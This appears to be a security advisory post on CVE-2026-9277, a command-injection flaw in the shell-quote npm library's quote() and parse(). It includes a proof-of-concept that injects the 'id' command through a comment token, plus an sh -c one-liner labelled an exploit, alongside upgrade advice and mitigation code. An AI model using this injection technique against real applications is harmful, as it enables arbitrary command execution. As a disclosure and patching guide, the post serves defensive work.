Listen to this Post
CVE-2026-9277 affects shell-quote quote() and parse().
quote() emits a { comment } token as followed by its text.
This comments out the rest of the shell line.
It includes the opening quote of any later string token.
A line terminator in that later string ends the comment.
The rest of the string is parsed as shell input.
Example:
quote([‘echo’, ‘ok’, { comment: ‘x’ }, ‘a\nid;’]);
Output:
echo ok x ‘a
id;’
Passed to sh, bash, dash, ksh, or zsh, this runs id.
parse() emits a comment token for a in the middle of a word.
Example: http://example.com/frag.
Callers combining parse() output with another untrusted string are affected.
Example: quote(parse(untrustedCommand).concat(untrustedArg)).
The fix for CVE-2026-9277 rejected line terminators in the comment’s own text.
It did not reject line terminators in the tokens after it.
Exploitation requires an attacker-controlled string containing a line terminator.
That string must follow a { comment } token in the same quote() call.
The comment swallows later shell syntax until the line terminator.
Then the rest becomes a new shell command.
This can inject commands into generated shell strings.
The vulnerable behavior is in shell-quote before v1.11.0.
Fixed in v1.11.0: quote() throws a TypeError.
It throws when a string after a { comment } token contains a line terminator.
Line terminators: \n, \r, U+2028, or U+2029.
Workaround: drop every token after a { comment } token.
Workaround: reject line terminators in untrusted strings.
Workaround: do not append shell text after quote() output with a comment.
References mention impact and patches.
DailyCVE Form:
Platform: shell-quote
Version: before v1.11.0
Vulnerability: Shell command injection
Severity: Not specified
date: Not provided
Prediction: Unknown patch date
(end of form)
What Undercode Say:
node -e "const q=require('shell-quote'); console.log(q.quote(['echo','ok',{comment:'x'},'a\nid;']))"
const { quote, parse } = require('shell-quote');
quote(['echo', 'ok', { comment: 'x' }, 'a\nid;']);
parse('http://example.com/frag');
quote(parse(untrustedCommand).concat(untrustedArg));
sh -c "$(node -e "const q=require('shell-quote'); process.stdout.write(q.quote(['echo','ok',{comment:'x'},'a\nid;']))")"
Exploit: (Educational Purposes!)
const { quote } = require('shell-quote');
const cmd = quote(['echo', 'ok', { comment: 'x' }, 'a\nid;']);
console.log(cmd);
// echo ok x 'a
// id;'
sh -c "$(node -e "const {quote}=require('shell-quote'); process.stdout.write(quote(['echo','ok',{comment:'x'},'a\nid;']))")"
Protection: from this CVE
const { quote } = require('shell-quote');
// Upgrade to v1.11.0 or later
// Drop tokens after { comment }
const tokens = ['echo', 'ok', { comment: 'x' }, 'a\nid;'];
const idx = tokens.findIndex(t => t && t.comment);
const safe = idx === -1 ? tokens : tokens.slice(0, idx);
quote(safe);
// Reject line terminators
function safeQuote(tokens) {
for (const t of tokens) {
if (typeof t === 'string' && /[\n\r\u2028\u2029]/.test(t)) {
throw new Error('line terminator');
}
}
return quote(tokens);
}
// Do not append shell text after quote() output that contains a comment
Impact:
quote() emits a { comment } token as followed by its text, which comments out the rest of the shell line, including the opening quote of any later string token. A line terminator in that later string ends the comment, and the rest of the string is parsed as shell input. Passed to sh, bash, dash, ksh, or zsh, this runs id. parse() emits a comment token for a in the middle of a word, so callers that combine parse() output with another untrusted string, such as quote(parse(untrustedCommand).concat(untrustedArg)), are affected. Exploitation requires an attacker-controlled string containing a line terminator that follows a { comment } token in the same quote() call.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

